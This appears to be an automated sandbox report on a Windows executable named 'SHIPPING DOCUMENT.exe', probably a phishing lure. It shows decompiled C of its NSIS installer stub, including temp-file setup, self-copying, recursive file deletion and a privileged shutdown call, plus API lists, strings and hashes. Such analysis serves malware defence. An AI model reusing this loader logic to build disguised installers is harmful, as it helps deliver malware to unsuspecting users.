				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42474c = _t42;
				if(_t42 != 6) {
					_t119 = E00406631(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065C3(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406631(0xb);
				 *0x424744 = E00406631(9);
				_t47 = E00406631(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42474f =  *0x42474f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x424818 = _t47;
				SHGetFileInfoA(0x41fd10, 0, _t164 + 0x38, 0x160, 0); // executed
				E00406228(0x423f40, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\jones\\Desktop\\SHIPPING DOCUMENT.exe\" ";
				E00406228(_t160, _t51);
				 *0x424740 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\jones\\Desktop\\SHIPPING DOCUMENT.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405BEB(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405BEB(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00406228("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403430(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403949();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247f4;
													if( *0x4247f4 == 0) {
														L67:
														_t63 =  *0x42480c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406631(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405944( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424760 == 0) {
												L42:
												 *0x42480c =  *0x42480c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A3B( *0x42480c);
												goto L43;
											}
											_t153 = E00405BEB(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058AF(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405892();
														} else {
															E00405815();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
														}
														E00406228(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
															DeleteFileA(0x41f910);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\SHIPPING DOCUMENT.exe", 0x41f910, 1) != 0) {
																E00406007(_t137, 0x41f910, 0);
																E004062BB(0, 0x41f910, _t157, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
																_t94 = E004058C7(0x41f910);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00406007(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CAE(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403430(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403430(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x424800 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                            0x00403471
                                            0x00403475
                                            0x0040347d
                                            0x00403481
                                            0x00403486
                                            0x00403492
                                            0x0040349b
                                            0x004034a0
                                            0x004034a3
                                            0x004034aa
                                            0x004034b1
                                            0x004034b1
                                            0x004034aa
                                            0x004034b3
                                            0x004034b8
                                            0x004034b9
                                            0x004034c5
                                            0x004034c9
                                            0x004034cf
                                            0x004034dd
                                            0x004034e2
                                            0x004034e9
                                            0x004034ed
                                            0x004034f1
                                            0x004034f3
                                            0x004034f3
                                            0x004034f1
                                            0x004034fb
                                            0x00403502
                                            0x00403508
                                            0x0040351e
                                            0x0040352e
                                            0x00403533
                                            0x00403539
                                            0x00403540
                                            0x0040354c
                                            0x00403556
                                            0x00403558
                                            0x0040355a
                                            0x0040355f
                                            0x0040355f
                                            0x0040356f
                                            0x00403575
                                            0x0040363e
                                            0x0040363e
                                            0x00403640
                                            0x00403642
                                            0x00000000
                                            0x00000000
                                            0x0040357e
                                            0x00403581
                                            0x00403589
                                            0x00403589
                                            0x0040358c
                                            0x00403591
                                            0x00403593
                                            0x00403593
                                            0x00403594
                                            0x00403594
                                            0x00403599
                                            0x0040359c
                                            0x0040362e
                                            0x00403633
                                            0x00403638
                                            0x0040363b
                                            0x0040363d
                                            0x0040363d
                                            0x0040363d
                                            0x00000000
                                            0x004035a2
                                            0x004035a2
                                            0x004035a3
                                            0x004035a6
                                            0x004035be
                                            0x004035e9
                                            0x004035eb
                                            0x004035fe
                                            0x00403629
                                            0x0040362c
                                            0x0040364a
                                            0x0040364d
                                            0x00403656
                                            0x0040365b
                                            0x00403661
                                            0x0040366c
                                            0x0040366e
                                            0x00403673
                                            0x00403675
                                            0x004036cd
                                            0x004036d2
                                            0x004036dc
                                            0x004036e3
                                            0x004036e7
                                            0x0040377b
                                            0x0040377b
                                            0x00403780
                                            0x00403786
                                            0x0040378b
                                            0x004038af
                                            0x004038b5
                                            0x00403931
                                            0x00403931
                                            0x00403936
                                            0x00403939
                                            0x0040393b
                                            0x0040393b
                                            0x00403943
                                            0x00403943
                                            0x004038c5
                                            0x004038cd
                                            0x004038cf
                                            0x004038d0
                                            0x004038dd
                                            0x004038f0
                                            0x004038f8
                                            0x004038fc
                                            0x004038fc
                                            0x00403904
                                            0x00403909
                                            0x00403910
                                            0x0040391e
                                            0x00403920
                                            0x00403926
                                            0x00403928
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403912
                                            0x00403918
                                            0x0040391a
                                            0x0040391c
                                            0x0040392a
                                            0x0040392c
                                            0x00000000
                                            0x0040392c
                                            0x00000000
                                            0x0040391c
                                            0x00403910
                                            0x0040379a
                                            0x004037a1
                                            0x004037a1
                                            0x004036f3
                                            0x0040376b
                                            0x0040376b
                                            0x00403777
                                            0x00000000
                                            0x00403777
                                            0x004036fc
                                            0x00403700
                                            0x00403736
                                            0x00403736
                                            0x00403738
                                            0x00403740
                                            0x004037b2
                                            0x004037b4
                                            0x004037bb
                                            0x004037c3
                                            0x004037c3
                                            0x004037ce
                                            0x004037d3
                                            0x004037e2
                                            0x004037e6
                                            0x004037e7
                                            0x004037f0
                                            0x004037e9
                                            0x004037e9
                                            0x004037e9
                                            0x004037f6
                                            0x004037fc
                                            0x00403802
                                            0x0040380a
                                            0x0040380a
                                            0x00403818
                                            0x0040381d
                                            0x0040382f
                                            0x00403837
                                            0x0040383d
                                            0x00403849
                                            0x0040384f
                                            0x00403859
                                            0x0040386f
                                            0x00403880
                                            0x00403886
                                            0x0040388d
                                            0x00403890
                                            0x00403896
                                            0x00403896
                                            0x0040388d
                                            0x0040389a
                                            0x004038a0
                                            0x004038a0
                                            0x004038a5
                                            0x004038a5
                                            0x00000000
                                            0x004037e2
                                            0x00403742
                                            0x00403744
                                            0x0040374f
                                            0x00000000
                                            0x00000000
                                            0x00403757
                                            0x00403762
                                            0x00403767
                                            0x00000000
                                            0x00403767
                                            0x0040372b
                                            0x0040372d
                                            0x00403731
                                            0x00403734
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403734
                                            0x00000000
                                            0x0040372d
                                            0x0040367d
                                            0x00403689
                                            0x0040368e
                                            0x00403693
                                            0x00403695
                                            0x00000000
                                            0x00000000
                                            0x0040369d
                                            0x004036a5
                                            0x004036b6
                                            0x004036be
                                            0x004036c0
                                            0x004036c5
                                            0x004036c7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004036c7
                                            0x00000000
                                            0x0040362c
                                            0x004035ed
                                            0x004035f0
                                            0x004035f3
                                            0x004035f9
                                            0x004035f9
                                            0x004035f9
                                            0x004035f9
                                            0x00000000
                                            0x004035f9
                                            0x004035f5
                                            0x004035f7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004035f7
                                            0x004035a8
                                            0x004035ab
                                            0x004035ae
                                            0x004035b4
                                            0x004035b4
                                            0x00000000
                                            0x004035b4
                                            0x004035b0
                                            0x004035b2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004035b2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403583
                                            0x00403583
                                            0x00403583
                                            0x00403584
                                            0x00403584
                                            0x00000000
                                            0x00403583
                                            0x00000000

                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 00403486
                                            • GetVersion.KERNEL32 ref: 0040348C
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                                            • OleInitialize.OLE32(00000000), ref: 00403502
                                            • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                                            • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,00000020,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,00000000,?,00000007,00000009,0000000B), ref: 0040356F
                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040366C
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040369D
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                                            • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                              • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                              • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                              • Part of subcall function 00403A3B: GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,00000000), ref: 00403A55
                                              • Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,73BCFA90), ref: 00403B2B
                                              • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                              • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                              • Part of subcall function 00403A3B: LoadImageA.USER32 ref: 00403B92
                                              • Part of subcall function 00403A3B: RegisterClassA.USER32 ref: 00403BCF
                                              • Part of subcall function 00403949: CloseHandle.KERNEL32(000002A0,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                              • Part of subcall function 00403949: CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                            • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403780
                                            • ExitProcess.KERNEL32 ref: 004037A1
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                                            • ExitProcess.KERNEL32 ref: 00403943
                                              • Part of subcall function 00405944: MessageBoxIndirectA.USER32 ref: 0040599F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                            • String ID: "$"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SHIPPING DOCUMENT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 2181712934-2017937238
                                            • Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                            • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                                            • Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                            • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                            0x004059fa
                                            0x004059ff
                                            0x00405a08
                                            0x00405a0b
                                            0x00405a13
                                            0x00405a16
                                            0x00405a19
                                            0x00405a21
                                            0x00405a23
                                            0x00405a24
                                            0x00000000
                                            0x00405a24
                                            0x00405a2f
                                            0x00405a32
                                            0x00405a32
                                            0x00405a32
                                            0x00405a36
                                            0x00405a49
                                            0x00405a50
                                            0x00405a55
                                            0x00405a59
                                            0x00405a69
                                            0x00405a5b
                                            0x00405a61
                                            0x00405a61
                                            0x00405a6e
                                            0x00405a71
                                            0x00405a7c
                                            0x00405a82
                                            0x00405a87
                                            0x00405a97
                                            0x00405a99
                                            0x00405a9f
                                            0x00405aa2
                                            0x00405aa5
                                            0x00405b5d
                                            0x00405b5d
                                            0x00405b61
                                            0x00405b63
                                            0x00405b63
                                            0x00405b63
                                            0x00405b63
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405aab
                                            0x00405aab
                                            0x00405ab4
                                            0x00405aba
                                            0x00405abf
                                            0x00405ac2
                                            0x00405ac4
                                            0x00405ac8
                                            0x00405aca
                                            0x00405aca
                                            0x00405ac8
                                            0x00405acd
                                            0x00405ad0
                                            0x00405ae3
                                            0x00405ae5
                                            0x00405aea
                                            0x00405af1
                                            0x00405b0c
                                            0x00405b11
                                            0x00405b13
                                            0x00405b37
                                            0x00405b15
                                            0x00405b15
                                            0x00405b18
                                            0x00405b2c
                                            0x00405b1a
                                            0x00405b1d
                                            0x00405b25
                                            0x00405b25
                                            0x00405b18
                                            0x00405af3
                                            0x00405af9
                                            0x00405afb
                                            0x00405b01
                                            0x00405b01
                                            0x00405afb
                                            0x00000000
                                            0x00405af1
                                            0x00405ad2
                                            0x00405ad5
                                            0x00405ad7
                                            0x00000000
                                            0x00000000
                                            0x00405ad9
                                            0x00405adb
                                            0x00000000
                                            0x00000000
                                            0x00405add
                                            0x00405ae1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405b3c
                                            0x00405b46
                                            0x00405b4c
                                            0x00405b4c
                                            0x00405b57
                                            0x00000000
                                            0x00405b57
                                            0x00405a73
                                            0x00405a7a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405a38
                                            0x00405a38
                                            0x00405a3a
                                            0x00405b67
                                            0x00405b69
                                            0x00405b6c
                                            0x00405bbd
                                            0x00405bbd
                                            0x00405bbd
                                            0x00405b6e
                                            0x00405b71
                                            0x00405b7c
                                            0x00405b81
                                            0x00405b83
                                            0x00000000
                                            0x00000000
                                            0x00405b86
                                            0x00405b92
                                            0x00405b97
                                            0x00405b99
                                            0x00000000
                                            0x00405bb4
                                            0x00405b9b
                                            0x00405b9e
                                            0x00000000
                                            0x00000000
                                            0x00405ba3
                                            0x00000000
                                            0x00405baa
                                            0x00405b73
                                            0x00405b73
                                            0x00000000
                                            0x00405b73
                                            0x00405a40
                                            0x00405a43
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405a43

                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,73BCFA90,73BCF560,00000000), ref: 00405A19
                                            • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A61
                                            • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A82
                                            • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A88
                                            • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,73BCFA90,73BCF560,00000000), ref: 00405A99
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                                            • FindClose.KERNEL32(00000000), ref: 00405B57
                                            Strings
                                            • \*.*, xrefs: 00405A5B
                                            • "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" , xrefs: 004059F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" $\*.*
